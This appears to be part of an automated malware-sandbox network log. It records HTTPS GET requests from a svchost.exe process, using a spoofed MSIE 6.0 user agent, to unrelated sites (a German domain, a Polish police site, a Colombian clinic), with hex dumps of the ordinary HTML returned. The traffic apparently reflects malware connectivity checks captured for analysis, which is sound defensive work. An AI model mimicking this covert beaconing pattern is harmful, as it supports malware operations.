                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      63192.168.2.522763185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1074OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1083INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:35 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1084INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      64192.168.2.52352291.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1084OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1085INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:46:21 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:35 UTC1085INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1101INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1117INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1133INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      65192.168.2.524097104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1133OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:36 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Set-Cookie: d55e479f054c94814cbc10d217aaa990=ccab68a15823756cf406ae277e3a28c3; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:45:36 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=duzl3flaO0hzWOQRfqy7vBDuMYl45bF9skdLiEKM92vpERpWW43twb7eQgJh94%2Fe8nBB%2BtXEuOsR%2F6p1uXJCQy%2FPVzZ%2B9y%2B9EZGwZXZ69Ulsq%2F8cNIHeC8jSL7CNuX6zvP21Mwn%2BcDM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc93d1b1e2c16-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1134INData Raw: 37 63 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 7c46<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1135INData Raw: 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: e><link href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><li
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1136INData Raw: 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70
                                                                                                                                                                                                                                                                                                      Data Ascii: t src="/media/system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></scrip
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1137INData Raw: 35 2f 61 73 73 65 74 73 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72
                                                                                                                                                                                                                                                                                                      Data Ascii: 5/assets/js/html5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></scr
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1139INData Raw: 73 2f 6e 75 65 73 74 72 61 5f 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                                                      Data Ascii: s/nuestra_clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1140INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: s="g-menu-item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1141INData Raw: 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: an class="g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-ite
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1143INData Raw: 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                      Data Ascii: /index.php/nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1144INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61
                                                                                                                                                                                                                                                                                                      Data Ascii: class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul cla
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1145INData Raw: 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61
                                                                                                                                                                                                                                                                                                      Data Ascii: li><li class="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span cla
